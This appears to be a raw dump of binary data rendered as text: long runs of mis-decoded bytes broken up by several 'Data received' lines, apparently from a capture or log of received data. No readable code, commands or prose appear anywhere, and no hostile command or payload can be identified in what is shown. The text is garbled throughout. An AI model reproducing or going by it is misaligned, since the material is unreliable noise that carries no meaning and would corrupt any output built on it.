,ÎxOs"¨M„ÑÌù1#Õ(!-î†iñO™¬)tŸÊ€â£ó[9Ž &u‚™Výœ~8ıÒûØñ´éIÁ"v—;öœj»†{Ú«+ZMÁŒW\µ>í“)ͮ֩ŒçŽg?|(>Bʬ’ºÀ$ »ú‰ŠZ:V}‚£Õpi8Å~/xÅ@Ë~!òÂDnÄ ÅÂóƒßB9¢îy–DMz¶Î°° +»ÖÞ¢Zñ¢ÐBå4ÿ¦˜×$P¡ÕRw2ö±\C9¢žè?M”Á |²¦ý˜¼Ìµ'əD-϶šë”g2þ=ôò”—^è=Z¨qÚ°gZ"ÁêôǗ)¡ÔÁ-êg¢òPX¾Ã©×—о ÅúpñN gžž"A?ð¹U C‘¯N½Glª÷«µ_—80÷Ž‰Ïþœ+Î#íw8Ú,Gí9Á"‡ÞÏ?ìÔ5‹”¨­yu‚M’ÏÕG=ã üz¢ä_ÿ®¯Oßw¥´ è0Âö¾jS^CSͼ–‰>æuÏd¸fŸÚ!ypX/˜g 7yê)ž)d%½W!f2ŠÅ‹em4ñW¥°gþoE3Šïðépê¾]×G´‹Uâ *Ð'2ŠøB‰"z~D£1qYÃUmRB<ï;~”ûr¾LË|¥ªVãñß¹ÚªO¨MXúòÆr÷OTù*¶E%.ùÔ+™uài=¨ÏÊ⧔œs§1d„ðÔ ,YÝ\?žÞ°ˆ„š¿X’=ÃËKǃ§' ¬m™°Öï̖ÁíQ+šo–—w˜ÑÖÿv 3iª úìi5”ЛøíɄ@³OÉH¹?©wߢ¶Sß>'ñR4ªŽXÍ]’
Data received /Õ:u cr‡ú.¡¦®C–ŸšüÞ ·ÀTu/6¼€2rô¶1;_ˆèš—B\2ªÎìs‘çÔá«ny1±_qÒaQ·°+™rÛ¢ ®Èvzé?¨ºEç-îXÿ¸AÞPlT} ²ÀµÈÊaÄ/èÛ£®ÁÞ)gÐË9£á~EHMîöʀⵒJ˜iÖÖ ˜#/‰[«ˆÛѲáþ»~f¼ ö-“èM˜:}ôô•Cæñó¡©xöš¡8œÆ9c7քþÕø·ð׃"ý ‘¦ŸÇ@çë\·Q\à­_ñw•¶ĭǝ6sÃ@uüm¾Ôː?®©v‰šhÍu￘/SÒ¥!ÜÚr‚ô˛ ~¡ÎMiP\¶-ÞA:öèä/ÊՇ¤Õ¯nºB¿8ûAÇsùV„é;ƅ†P9‡Þ*f@¯å9ÄqFä8­v[Z£ÅaT¾<ÕmîÕ ¼Å,ZÕä{¸å¸:fm’2Ò’ô7ÇU¢„Lþ­¬~à#°\uŠoù÷ËqoŠh¦¾îîMfcږ£Ö’jÞ%Ë“[Ý? ø=&Åħo>­LÉ í#Þ;oŸ#‹b 1~OµKNÉkg@â1`6½¦sÈ#[þDŽ<r„M¿²/v>G¥Xø^ŽOK—TèÀ”hé ]­4ܯU¨dš²£ üçD® JL© “ó;˜á†÷ïõ"³m­îÙy<ÖoÕ´N“`›øLÆóIèÐX-‡ßôv8–Æ»„@½MGØÙ;o«›_¶%±/o½2F³ÐKãK}ðlB|V‘êÖ†U€¾EÃaöKõ×Kì«ßú’ŠÍxÉÄY‡ìOHÃ6X¶;ÿ"ia͎«’DÁBǯÕ"o‘°ZϒÄLÃÃ7ïrñ€TÑ¿ÂI´“@Üü9hHl¨ãtË£GîÌ4ÿ“+ÉôV·bÏLž)ö­)3X‚‚ßà°ÉŒL€$ÀÂý­ù¬!È[Ï0f¤ûU-î&¾!H·6=ŒdQ¶/²TFï´u@ù<dÂö߯hÀfù½SÁÉQÚ:üñNõ3¸•¿ÈF€³H‡cà;]*¡zÒDžÆo´õÂñã6ÌsJS³’ªZ½Ž‡­@jñE Š¦î愈üÃs3 ¦ûP?«ò”?՝uó ¤ÜtÏk˜®ÚD¸¬6âï^‹%“kÉ,ØïRæÄcõѸ´j莭2 .Ãæü}pGzÁT*¥#ôÂR¿Võý&œX‹ÎÔ (>n.)±bo¢¨TfÞ«krŽC—í-5Ô²³–" CÎdöö Ù¿ Ò#VF™BŠ®%¹>P®Äb(4{§f¦ñI’.•¾ZDaA­ƒ¢6^–v· ‹Ve¼×{ñXÌì»Q 2JIì>Œ5Çb%áÁç’KM÷,&”cÇvs'F‡5`º\9™W°¤Ÿ}ŒæDaF5§‘1…zE×QJ†4„ÐüÜa]·0DCõißOåi¨/X,mÙú% §’Ì¢t­kÆ6ä3eÆhÛùØ;"µLðX„3óo‹»ÄX*N „+Æy“jÛ|'7P$'Ùññ•ø%‘¡Óð¹úoWƒ§\^0zl08êªLz„‘qè ã`Ýp4?>k^ èj†µòrl«n S°å3™ÆVåz8 œ!û­‘ö&eè\&שñøršâ¶-æȪY~Ëk ýg¥Yc”]‘m.ÌÞ¸b§÷à šTê®Ë¯ŠÞ¦” ½ýÆæf‹ûY¬ïoû˜¾Ì$_ª§¤
Data received 0›éæÀÚ}€Gþ¹Üï½?  ?ñ¤¤Ð-Ö Ðt!z P®GoÛÿ,kÓu­>²†³¸*£íûöMËO|ò>4½Å‚‰ëâm4…±XH éÕ¥šÐõLNˆ7$"`Y.Í5Ñ+Ú]ÔIþ3BG]®*“W<ý®Zý–‡[”Û_Åǽâ Ö'•¸Eiל?Ðf2ò¯¦HÃxäW»¡áõõýa8!íM^E^ÅA@>h±Áž>}ÚMVÕ.¬h ]"+{˜žô:'%6º@uqzåÙ¸Y©½ÎÙфd<`eÿ/qó‚( ,êõ·’"ƒ?‹ØÈ·)¨Ø¿ï HAk7R링qXHئ™Zݟ»Hrå‹n?f6 ݽ}Տ-ÔÙgRñÒ:ûÙF<ºrcßâo—»xô×˕Ü0g0ïR^OTÀ¡åÝ †í0ïâ;ºpP»È ®ß‹b“«Ǩ‡+&œL3'GZEüËøqD©B7:ªÉ çP3s€á-`¨6xöVc§Q>T=Qàyšñͮ΋Ç6!ìË,ªz˜øÜÜAs—IFµ“ ¼Œ—­Š¼ìꏠ°“äÏ´x.]:E.°þ&ˆ‘"VŠ†úÉésyLMf;ËÄ"˜8\ßÝÏ)²ôÇEÜÿû%.f=Ǟ<3&žÿšO,|–ëú®§õ¾?çE]Ÿ-Öº™vVÊ;½(ÛPU^ÛäæXº´Ð<îDx½{ÐÀôf ƒŠ_!)sÊÿ1JÌÐÆ·‹êGuìçϱˆÔ¦eÂÅÿx Ë`™­ ²oÕ®—QªÒñl™Õ„»ä<¼á lR³^©ûaÑ;Š½n”ϪæÚ´c,›mNŽðÛ2젚µZŽ‹&/S4¿· €Î(úBáÏ<Ø{?C¾]àka=¬“Õ54ڀ»—ì?»òàRwåÿ˜²é&°s$AP7} >ÐB5¥Ûþ½;ˆ%1ïÚ®WºfdSdE¾•H¥*¥m˜"ªïýDœæ¤*×9UO4&*K÷ŽÈ~³'ƒâà’ÔbTâ—sµIršn¬³ïxNÇ®Ý7n­ IՄüvÍX•?n‡XþÕ¡êÚ8{|ž$:·´`V†géÏÜñ¾u,ǏrZ‹ùbˆOÖ4¬LY€Kß×x›,Ì#¾…Z¾|“ %Ó‹^‹ô¯dÎí½ó`F|У.êìÞw©\Yõ߅OŒZ!Í,K$ØÝapÛv˜¥YBqAvìà¼õ’xÿPn—´t÷\¤¿æ¦÷Y͎!ú˜F|dµjaÝþE >‡eÓ*‰J‰tØèð­bܪð>Ғƒ‹Ì9Xvdq¥ò`‚+2,ʋfF¿+̐7öäB¨{´d¤räӇ¸X½"ߏ•dL­‡O[ð—ß™f–ú”Øj¦S!úÊaý‚Y‚4¨›8ðYž_§;öј8‡ü’àzã«Õ×E1•"þQJÛ֑B qF+¬*Vøb;zÁ`!!èVÅ«-óX·?óé$<,Ž@Åq²µŽyÁ;rZ™¬aßjðW`N Þuhô2¶kÓÿ¶Ye%Ô¥ ý¬F—oNËÑGÃ&·ŽF#MËÛL1Þ<Ž£‚ahWĐH‘^d½ó-5§×ÖGd㈧YHºñˆ§'Sõüž ñÔ÷Ë]ý°é–§nl“4R‚LÉçh› ‰•0ÏNª³Å>f-aOaBž¡²zð ݦœ"m|½¼Q°.™ñ*Þ=ÐK\që¸~¡@B©$Ì$}*å3Zð¬?”ò7/B
Data received µO+·C¾KO~‘¦9|‰î?à6UA°7ÕÏ?Á¬G%GùúÙÝÿ_ºÊ”WFøûr»ï Z¶áÃø!9rÏ3Z>æ•oqL#ô´áîwÐǐ$šÎEpµÛþ¡½JH‹-ƒ(’æÇ]ۖ_¾¡a6zÆSž…-Qe5éyÊIUÏaœ ’_J :™Ô=]VQ «sâZÄV€k‹Ìýö÷·N·†ÇdT`î¦?Éö~bI<c¤¤#¯ÓFÉ69懲º¾%À7Å»w²½ne†þ츜œ@RUâE{ʁ_œ-Uâ,•éN (¼ƒ ¥ÆFҗ¬†Ì)@í'c,ÿø­o§+áÄØ Ù•{ÅuAê4hkxì[RñSõ´³-*¡¯VtêLKµ£At´€,! •_|3!çߓI؉…$÷“|3þx@Úu`‚’^¡™Á¨r{pgô3Á{ãþ9g‘ÎOâUwš8GJ4Mî3¤–”½"ýúÈ” tüؔ^æTÐï =ÚʽÞ 0ë++” ͟CCr.x†ïËøv ;Í=ãėÍÍv¯óÂûåF|Ë2z„ƒ2!øð>uý`-n5«\~¦¨ª*ÅjöOüläV¹:ʾ`¢UWg«NÞòl¨”(¼3Úg®õڀã›ù]®@àÚ÷i֝»zn þ-bù[:rÃg(o4p_Û.páCåÞ%~4WGs6ly¬^uNÉNﯗ åè*Ӛ$óoñ0ó¥_e^"¼ñʈ«ÛÔãIH¤s°gK(¸‡Gh·ë æcb3(Ë+¯å–×<ŠÕ¦H šfFâð¾!ð^qq|…7ó±B,¥ð¨n6%¯OoezËtfå̧Ävƒ Ý­¸ñ½³Eޟ֭6¤Ð+îƒ:d<¸ ³_¬ýçîwyξI”ÄDrÕE—©íEýBBaz¼ÊÂü¶ò„ž°Oå±ñú8Pe1¼ø ´L®¼bi?ýO'²ë¤&ÀñI€q¬lµœ—còû!êñ@9VNܦÄØy„;Ëþ¡)ÊÔ#Œr¦Ä’Ä'Š߂ðÚK‡»éÆÞ³4‰i¦lV÷hÅÁÖ\¼Ê(4û~MqK¨ €)Ü Ä æËøOé€vª½Xu-4§Ö¼õÑ °²JaÚpÏý·£!®n¡ÜËA¼û"ÿÐwÿ_„õTÒ/#õtMT­…’&„!ªêµn* ÖÈÇÂSX@86CµïËXS 4¢”ŠÑØ4e+c<»Í¨mH[ ´åÆý~fFÑRîÖéìö>kÒ äŸÆäÑÏWŵ;кWáéQV5Jd³­g­“ÒRÑ\ëZ§˜Ó¼•F®@Ÿþ+ÑOYegʦßk¯?ÝÿcE9ú©Û¶Oãs›ˆ|S;QÒj¯U¸®œ°Ïîæql ¦o`ù"•Ûb<‚%՞±ÚÌ*Áª‰ZÇÕÀXVÇ¡¬‘§â×P„?çN~(ÙðsÏIÈð·ªæpsÒóݙtÓ»è­eeé]Xn°Ôdóµn.e”ÙkXýD‘­-ÐqÞÅÔò"Á^V×ý“O÷ó÷°re“{ôû‘ÿ*-Ï~À D’˜·Xˆþ§3‡v 8·~hº°º‹€|7»½PÇ3´´úP•µ4Ô¾= ¬+xUñhq’Ìñ•6èMŠ°«ȤÏd®_ ˆúç/ÿ]ÉLíÄ\]5M1o®E‰óæédÑ£A)Ž¤æÙÌN/8›X³¶¨òÁ¤ÐøXN5Zª@ªgµ\ýߛu2i;C
Data received ä@֖f¨«õ  &Ô [±_šÛ°7¸nùBÎüý5ÔÌEsW#>` ‚-3ÀJV´ì%jzY˜Ê.~GÝUƒþO1Kb¯&@ªôT;þX"ª)½:鈶JV>ßŇøFkÙÝdˆ«)IîVixì€ì¤xê3>Z½ÄöHDj¡u3@rÌ÷cr¢{aPü[”O«WòMۓËujìzƒÂ r©ý†0×óK1#ÆA1gkÿÓpdÎ ãÞkŠl'tnƒ"aP’ŸWðeo©ºñ};‰OÛ_B$?ƒq•§ÕP&Úô’óÀ¡·¡˜"ãmÐr‹!¨R®†6 ®¿^ ½²5w¾tt!$~cœÿ¤éIuÖ#nxß@Åt ¼ØqAã;ûþD?«ÿžÚ—qIä¥ ÷`J‹ë³.â1¹AW†z9AC¨Æ˜D+abb+ü¼JÁd\s7¼ê9Téß´Ã%—<}÷â^¹CÔ¨Lí8yrÖ`õÒdñå?nf<z‚áð ô6zá¼xþëîpŊ C!Åu¢ì@í7&”ópèP b†ÅЉ÷„´$¡pÁå2lëޞ² •À®¯Öý¦ )é¿ñ¬Ö4 ,Œú·Ö¾œYϺ…Q£îI[¦Ib¤ÒI«U¶ÁĈ6Ù,¢æSG³/¾>kIöÓ&aƒˆä#NÑ­=>˜¯$l'2Š—ä-¤Ô{Á1Þ%" )1&“ŠÄ‘Uu§âÈ$o#(J‰ÇäRÄÅ= tD¸7éÖ©aiÝÄM´2‘Œh¾9äS›iåB§È»ÒÞÌ>1ùŸßªâhc4^ºU)½´VE›PR {’™ PL§X5?3oàé4^fw¶Æm¾ðî'&nAøêWSˆV=€úÈ°/˜FOªíù/~ž•E¸ u;§¢ž…½-'Îüבøzí-ì²; Ë¡‹ïm:ÚӋݼ‹˜ºò;gèR ³ˆh¾kŒG¹c½âDD9%Û´Y‹Ö¢PiÙge¨o’@S®à5ƒN– ´#–x7ÄÙ«ÁæÈq›#¸#}åA'ÍÃû2¶¿è'ú&ìÉÙ_‡(µ“¦@WÓzMüʌãúÁãéD‰cãÍÂuý©,|0Gݍó'âÿ7ՒüYq©ö~ñ$†/·¬+Ž£úéÈü€¹Íö.櫟ÕJø­û»…ÞòÅøÖ-ô€ÂPå`t!€6¦]Éà/}Èøp ¼¦¡2ÿKև@à•}v߉É*M¶[Ä¥÷©"뀢àa«æ{ü…ŠÚOâÌhƔ 5Œ(¹V ¯ªª™Ñv gD  Ü9â›^5uóP,=ôh«Ë·M(DGSÿ0,-—⍹f›ø(sù¿æ‘ëÒÓÊI»(äk)h‰,f™RaÌ(ǎnjĚYLÒãN3₮ç%f¹ŸžžÒtƒ'¯¬Ú+«Û[ž€i.˜}†ç»º<Ÿ¾»Ê 7?E† UœìÂ&jK0I t(L«ëÙ ³ÆrËlv®™”<:YƒDwæþ£‹ðÓ8ÿ$A™K}3¸&ßúÜCòèR‰ö•k%ÂÊd í¥”hk'Ù¶®»; à²À.–è:~ÔI›3m:Ÿ?Ùò¬Ü2ù´ÅnÀš­O±†t¨¥]øMÚhèúrð“ý×Ì¢)ћïV'ñÊI8ÀŒKX§l›<nä•üòp³õÌ")zt]Ú/vZýž>ùèÝሣcf³}.·ø(쇀‹ÄÛi¨ð£(Îÿ®`܀ã׫R÷,ƒ­
Data received Ü«ó0^ç¼ïø]!|ýíˆqW§¸ÿ„gR\ _G ?ñSô`()ŸŸÊ]-b~Zooµ—þž@´ŽÎÙÈÁøär÷B(e“3dãA×x,'=:é6ÿOžÉ­ù@özzôˆpÃñ{F¹ÌØ ~¶ù'ýGa”¹Ê€ˆ¼'««-MTÅ!×íWÿ}1#M9ØɺÝ{ë5V-kÏÏù-ƒ=‡üÒêN rÌ'"¹#Ç D}«™6ìÓØü#4…¿KÓÀ Ï~Væ÷DªÓÕÛOùË{~O­6“|†ð(f—¿Å.Ü3${óÍÊl·Ü­º»¿fv A‰ÛáÜu~C ÞD¬­ wU‰Òc úJî£å*ý¤ ]\샽òõN×íä0²"ˆŒß=DªêVÞ·ê%é_oÌå$"çX ƲҙÁfœëdñbÆ¿¯?fçlsޜUú¼næqƒPeÛÖÚ‡"KÈ®íèè%€W¾vMeßD`ï»kodt36Ô ²ì>B¿ô’ÄàSD±—Úm Œ÷§iC÷›·Æˆ^VS#Dò78Û'?k¦? -†WJ×O)qcefkëÙ ù²üµ?7…LÛØÙÊå)tÇo»¿¢ˆškò;\©˜ý$þ=û‰n­ ¸ xåÕÃeM•TQ^ê¶ùóð{¢¬@VĻۿóìèݸ¸ßYÙÀžþÿ|&Rþð™$ ócËÍ926#EÒfî7Ü:û7«müì0õÍ);ŸÀ“œ,”֝Uþ¤TTŠ¬ö!!™B2šEßýï] ¢û78™¨TvÓ¦û’-—ÝdZ;-àêŒ_iÈÈÛbdäK¨D/3öOҐl£P¶"`r+̏•§d𠧙‰o!Sê¶ö·¤ö*³k 7’â××öŸÈ'f)`¬ #‡qáM9"²Ão,¼w‚2¼» @:¨…63 ò+öðQRþmzž¤Ï²Zîü®TCË®¢̞¶íÜð ¶Ï^D7óܼò@æäùãZêtÈC¯tYœ°hJ©ÿÍ77õÜôë ³œWµçý®‡%ØÎeêöã^8ø•PŽ…‘ñþi·v“-cêp›¢Ç&W’EÓ|ýÞ£ô7*àËéÿø¼ñîûmÙRL0t 빫¹ÁßFrӁ“öj¬,½u튱Ž“v®¬û…[8<Gà$„)J8»ŠÈßÀ¤Z¹Ÿ;¿äšŠ¸°Ñ[0û ô'ñŸ£KG߈íjÔ×É@Îð3yà—p밵Ǝ(\â—x9Çs·Û‰Ô®ÉéU‰cq¢E®Á‘X 'ær`ÃkF3:[V{á6äNE.+!Ž¯´ƒêÜâi íq<°Æ1úV_Y°Â‰&%&Kô֊³5ò²¯Î‡!¾½µ³kÐßè¹(’¸×hLr vþ`E™t)3Nf"H.Y¬/öªÉ©(ИþÈêuOéβ»$ÁjÿŪV4_' ‡®Šè(3ò ûÛiTÒÃäÈÍvWTw=b 8ý…Š/ˆa±½ë‚tÀ½žI…J^sKaßÉ®.ƒzríåúé:ŽKÙg¹iÜ_®r->X7dPQq9AëåœúÚṂ@&Ñ17ZjçìS` GkËΫߎ/jLŒ GkïàyɊóþpä§C îøPXÿৱXŽ^c„8KC +cß‹•Æý;Oh|´`_crȾ5ºø߬PÌ\Xžã¤fwçOäQ^pŽ›ä´ôÖ¡Ýss»ÝÈ˲ú;F [²y'÷‘Ë/Ï©¬cüQ—^Dº%B
Data received @ŠÕŠ-¹ƒ£¦cwB—ê?ŒÕmÓYý«Ó.:0%ÏpÿñÄ9¹šk‘yâT“?Ý@9„ ÂÒ¿~V?‘¹~yVY¨¶;&mQÑsuV'Ó¿aók)©jÇ@-ÑvU*Ÿ/ Ð+ÊÉâbé–{K—Êf1­eZ‡®•™òc¼atüo,ؕçP ÊSµßå[»ý¡Lëò'3Ø@Ìê$°JÖÛ þк£ÉO¸W”SÈE-nB§ËÓ5ó£!†d¼'Šº]ØëòlƒÑ}sZûmPå«o€*mÕh¬Dÿ\‚FËocA‘bKiÄööïÅ+ç øEv²C~õ+dª¯*‡™³ÇCxpœ¯ ¬ÔÄ­M—FddþË@™YøJ’&T èŒl |’ÇX˜ïVÆY s 0ÁȞÅzÝº‘ÿôm4÷ÇI©‰‰‚´}í*«>·èK@ýâvmõËgqiì0ñM8šQ+–ÀƒWd£ÐÑÊÎDaȧ²¯#SŽ aó½X»IËܬ d;^ªkü-ò©¶F"…³r+%io”œúÌn•­¡¼©})AËJB¦äþ.›?v ݺUþ0XYáy1¿âð7¾â9S £ˆó3O3\ú†‹¢ÿBA«/]Ó$«ÞÀˆ­ðq“¼êRæÅá4¯”K½Jh{ÜÖ}NÅ&‚×ó X쁗v-ëÄTˆFh|"³R¿Í@eBɦH”Ð'ÆMfJù4º_2Ò·6¼fº×תàà£-lo:íðÒÐm€·fûKD[52CøTòZ×m‰ë˜ßàEëïÞTÑ£ƒú…?zÌæ´V"LÈUî–\¶7ñÏmùO‰†y¥R‰!Y«Û»ŸñŠ-#öjÏú‘DH»ûŒ'ØÂdhWêfˆÆYFAïtu«>"C ï“Ÿ„Sñ´vã3âùÎ̤“MhtÙù »dXŒqÑ£¢Ñtt¢þÒ¸†é¿A˽nýêWŠß¾Q"ˆžA¿¢û_©vøzô˜³)µtý©i’h¸0çÚu–úLõ½ÍˆŠ%…Jºù¬}ç­¡p’åؤ /†oLÇs2 ûl\•×+÷ˆÔ#¨f;|¬üº^7þêaeÜ~MÇòoÛ¡€Ï˜,ð02›0q†¨'‡ú„3ÎÿfÁ0ä4#H“î•Ñ:áE¼ÂlêHR¯¸Qž‹QCdÓR"æ8¸Aˆ[1cË+¸A¿ ²¸»Y nãÿTAof*ÝÐ+ n“hh!¶‹oB쿑xٓÈ=úø³Ô~ßm"HìI.å¿hþ¼~+€å’…qˆm¬”ÜŒl}1ƒ°üIÅÀ£ú¡0¯Ë‰àH€`æ¬1¿“Лz!BèR±Tær.çÎnæÆÚz»Oî8Oq9šl$ôĈƙÅ5£þìiV<Õ¿ ÅÐËy÷²~:©%IÖa[Ê¥Ì]9•Ÿ»"£wÍbŸ72L~'e'\Ä¹Ž4õÙ(x*±Ñ ¹³4˜wûKk G{åL-G”m®0»=ø÷úR)‚ ¹úy&èk†<ñs®Ñ=b€¿µ ±-úeyÂÚûäy°ÐV%rª™À¤CùÝS®^ yE­¬A8Êøc=Ðàå‡ñ(»4¤‘ÄÞ´ö~B§ïP•àê©á,ì<ܨy7NÈ+ÑÚyaÅMÔɯ¦fêd‰“üòé¯Ð©ÓHÝ|æ¡Y-›l9…Ï‚wB§»;N\áW;Y ÙñwÿSqmý.x–M“«¿]±™¢Ã’ù#· Žÿlrv4!
Data received ŸsÒú'$”°tfÎe¼¸%iúe}~ëÞ?.Á¡h_*ûš:¾ÆÓ³Þ'HÍÔ¬ ¯c ]ŠÄ~UîïìêU$–%A®/M‰®ooX£r»Ï9J¹Î³È9…³rË´‚Ê<œ l}jk\­3R¾”ð¥_/ß_1Ñ*ȏþ¾sGÝPÜè+Jc7©2/ºB£~ñí¦ÚÓf2Î;mxàª¶·á`@ø±žª2‰‘)Üö”QHÌÖ-D¼­ÌTÛ§T3»Ò ™¡Á"ÊT6¹½;ãˆ9±{¨2õC !L0w˜&p=—P¡ùÏn@½ª ÓSlosÒ¸ôBf|ˆˆ±è%© éØ©u³ð1¾Ý… ÿ‰AÆΈÿ™Måù?ꀎ¤R<õ! OQŠ¹Oº§~’!‚ùç^srz#Sú†62HìÔ:¨íÖ°àRÇΊG«|1ªÖs„Ãd ¯N+g£^M‹T”xøÄå\EËgÇ$8eåã*Ö®GƒŽÖ`ûË#…8EQŽŠ=øLø¡‘ˑõo«ÉvãÿŠiÇÇÔ(¨³¹P.®-u$ÑÒ)yæôui\Ô4P‰0™#+|EØËhÈuãò †ïŒ­Æ¢Bæ´+DõÅ¥Aߣ¾Ãå–>‡ú= ¦$ܔr®Bê|ÄE«i) jϞ4MÆK‰LìÒJ<eãDz+¥»‹”ŒÞ¿MA»&ìú3FÓö}¯+œÆ1û‰›K²EÊÁ±½q|©<Fš€¨ÿÒ? à f™¡Úäû‹\žW6cj›Ó郀Dý÷RkåJ÷\% ÃGzí~ê5;½ãó\ÕrŒÜ0Š3H"š¡ÁAÍ~*‡M²ê€+ªè÷„ ˆZCâ’6٘Ï:1Q|° t"Ææ løÒ\@cÐށ9st S„rû<uªpØ‘mÂðy|TYÄ>#XÖÒÞìúÀP²_¬Üw]úú’†šã\䈏ùyžm<vTV ¡O´mû‘ áúËQN[`ùUYÅ\ÏEb¬±ǐÐ,¨N†¬5õÅ£R¹dZZ$ €ý9V‡^óHýÓå) ¹,–á"î5û¤TôÑKW€dF÷âSΰŸ¸¢úZQÿŠWµÐÍ”J?õ?«Êîp¸zP -©õöðczò±‘0Î &QˆÚ§“9FìÝ%ÛaúÏóëŠÛ7z +»Xe£¿›eP«H ùUÑ‹3°­õï]Ų&šIu¬äQ-ZßÝ>TA›‰FÍKB¬Ö6«¿Òé Ë.èõϦcŸ#¿-¸LºãÙ㠒BŽUê¡-œþ_æd[Ù³ #Ç¾Î…ù#—ö~L::[·Æx³­«|æ% ž¨ý…––I¢FÚ¨9¼k€ê¾¦µª =þjr~Ï>Æ´0ö÷¤„ø(·Hp6é®ÌtGdé¬IÍGjeú|F°Ec*½d\€ÆࠓfLœtYtÉÍ~*ír<×%¼ ‹ãòå‹íD³VÂEÀGeè»KA/¾úv³º£k?•«cÒ®Q8¤MMm‰»J1åÖ¨ä#1š#€Z¬½k÷@,ÙÈ=‘[pä]áYÃØ_µ;$J ô_‰S„x!­HçÀC[#‚tÃr§šÊ.¯@$³dáë²Ø ÖNÝFŒDz½š$û‘˜Ig³iro#K Б×Nk3½²ÊÜåd!•Õw¶¥ñ* ØÐm½hè‘* ¬¥Žkqá*ùeDµ€¯öäBH]59«3£…Õvö%Q‹p¯æ@Îa
Data received úAU,V™€Õ TµE©uPróé—þ_¢A(¦8ɆÉÅ J¿l¬)m¢&}»ã(²ÆžÚ‚ylÔ©6!…| !s˜Ô~ZƘ¥ ž"<bgOD½´­3þüwÞWuª/oþÑÏ]œÔ­ÀŒ24på¯TZ€†>[þ beïU­ ¥o7r&íU˜úüL©œxûÆngq<§A%O«&rѹ¡ÀNu½œ‚ çŸÔ¡~3-e¾–4©"{0™ùÕ½ÄIIƒ+§õ.=…C»Š¢_k‚Wb£´e aÕÍÔî\Ýìèujõ2>ý=Iý_™8× ~óZgù ø»ï°7Ü [oR&Ā|'¥$æŒ÷ƒVø ܆~8‡gÙa÷ág”¸1:÷ ¼Ýù|Ë`‰¹Ž¾§óR·óœ_ézZóü¢â‰|$WZ’ëk_$„E!¶ßV«#â^öòEŽ„˜e6ñPœ|å—égÏè±KÕýó±Ø€§K‘?æ\óYrƒ(ã`ü»R·ƒãх!$€¶žÐ{àó•Õ©³•5 í°,nù¼Î)ƒªN‡=)­ÓÞC vÒà¿¢ñ IŠ`rÉ@Êjc¯ÔºÄ¼XÒ]Ʊ3S-?S¯³{“^S€Šeu ´a8|l8&³ó\ˆ•¨ÙÔ¬[gÑÙZäҘ¼ ~™‹™¨ªW×#“n0]¬;0.pføˆmdç•ÝÙ~KÁȌ׼$9ÀìÜþ §Fÿà‰1úóÕ¾LëXѹÆíûÂ÷>²o—¹DFZô󠜪Y´Ÿ³ŸpqDnÅWšme¦0a‘•òÃÆÒuã‚’,DáôÝ>{Õõx1=Ïÿ|M’ƒKÓnŽé̔SKÝ5 z¾®‹ÑP½ùƒJö-ã­§Ùå×N(Bmg6Mu¶O±\{€is¦u)ýšár¯È‘D•†Ía['Š2‚âßý>tefùj8ŔLmW$¨‹:Öáғqó z)‰”ÓyTŠÓŠÎwËÀÀaS=°êòšüçúmÛyj}¤†FÜä%md47¯ 8UÄy<Q“bÞÕUìæþ˜ç-Oe=•M¸µ’Ýú2÷]à Ü[èÍP:wƌPaM/î۞ÑîtýCåßT…AR¾ÇÈø²-Þ§/W1ŠY—n¼xCù!:4G—R«ÎêÌ÷0ÕðîÖZ7ptãÀK½ÛÄÃãêÓLñŠpßfb!т¨ÉÖ ož°ÖéùŠÆŠ±0¤Ç=,CÑî”JêŸu?œÅúƒÀv9¿ »~Q²^5ÅÍ?‰t‘ûW$£=^$õ”;òo¨íµ²µ¥)c˘·¤–Àšž:ÉÄñô¶¾G¥l —¸^“®Ê´Ä¨šÑÊL±¨R:hé!‹,˜:vô˯Ä<3Jƒú>8Ïõ™ï…góãî=Ø~ ±D*sC³|Òd£‚±ƒ/xEÄÀTÑbpÖ¨…ôCŒæ²yŠ¦ JØ¥26$môOïÀð­–LÉ1ájñövŠô³x0Ä1’~…÷»Nr ²µ\ƕ”J¥a‰n ­µÂ¾ŒÐܓ.ßéL2緇íÄ×½| y¸aŒ+<r^¼‘Q ,Èë½ ¯ˆbH¿¾­!{5D¦}øÕ+ØF.³+#½¤TðC Õ˜:_¤vUÝ¢E¸Yl7Ô„ÌhB)±Iæ¬íAö:"ɏO9óÊMf1“KåÚ}Œˆkèï+þ¤ïžÀM®
Data received _‘\‚fò Û´õ¯…}iïeÛ"‰÷oêL•p¼#LzG1=¬Ùá-fx¼834šþèöÅ¢#ÉâûAâJ<ÆÁo2D’Oä֌yP¤O渐!ĆÝôaZ瞎ÕEÀXÉ.•¾øÀ_˜3Æ˦ º²±-õ=6¤?"½™7`ìɪC¾l*ãžÖ~œãÒ0ÂOâˆ(´C—¬ê¤¸Ð—Á æžÉ2Z<Ǫ{WrGçLà„è(9\ÃÕð×yý·Ÿváþ6–ºæžZ4üuä#b{TlsyKÁü5=bG+ö¯âj؏!!ª¹L‹r¿o].—1ÌsÒåsoCŠÓ›F¨µ·s³}‚½áD¬`#žeÔY‹‘ü—ð©óê ¡âLBq·ܾb+©¦bD90Ô¡7¼ è/K¬…Ä3®œ Xyæg‹/vH•ö7éAôAŒlA-[dH7Öç€- Vv8 rc¢`éX@8nBÝBQÌ;E˜^•bÓ=Þ¹]E ùDwöö€¹yið%ûHor [äŸ_à^2Ýÿfu©§è' ÒÁT z¤[и ¡<&ćPæ¸&oY•Náù¼î¯Ø؍sʆiüò$1C¯ÉãL·†žŸW—éܹKæÆË»þâE9!—Oñ¥×ò}úèâþ{”G‹,~FŠ>ëHåÝ8Žgd“üZù\7™ËŸ#™v8K êĂúëê‡Îl¶Ê,=®"Š8+šu‘†óÙ|¨XÿÁ1¼ïE£ÍÔK#H^dÑòCÌ]g f9©Z †¶}Î Úì\½Z=”§{ Ìq»™’·ª÷O´¾¿Í`Ö¿ Ê¿ü½Á‡ƒ½{å7¹d ƒ½E~JC~¡U…ilaHmq<ûbØHúÛE¼ì‹ÚV0r= ;{kt¹ø ƒûâMÉ}mD"‡Ž?i&(YQªðçDni"Œ/«I •ÅÜãúóìañ¸! % ñÅÍ2mSdu“Z›Óšc—Ü´†1WQV— ýº’C, ”ùOõÑô&ó )¯¶»>!eÏiÓê-D…9Þ@+ïƦO[¥€¯Ôl¸×±GMYJ崋ƒw<E „Rm ÆÌÛ¹ùºº!õ Ž>‡Üzº²xJ·Ê©}s@Žø#Ôd}[ä§ÖâñøÒèq½"BT'ñø‚ÜSaŸ.ÄoÓøÀWÐX%y8°¥Ç¦Äa69¦°@GÎ`Hnc¤ç‘0Ð_ú½§ÉúÚvT—_qVu Iª!ïM£Cà]‹Ã\†‹ÁRñÿ[î8T¨¼d9Õ/þAĘ^›æ„Ã<áhMêz²‰žrL©/•,_BTʜWÝìE#W–)ȋ 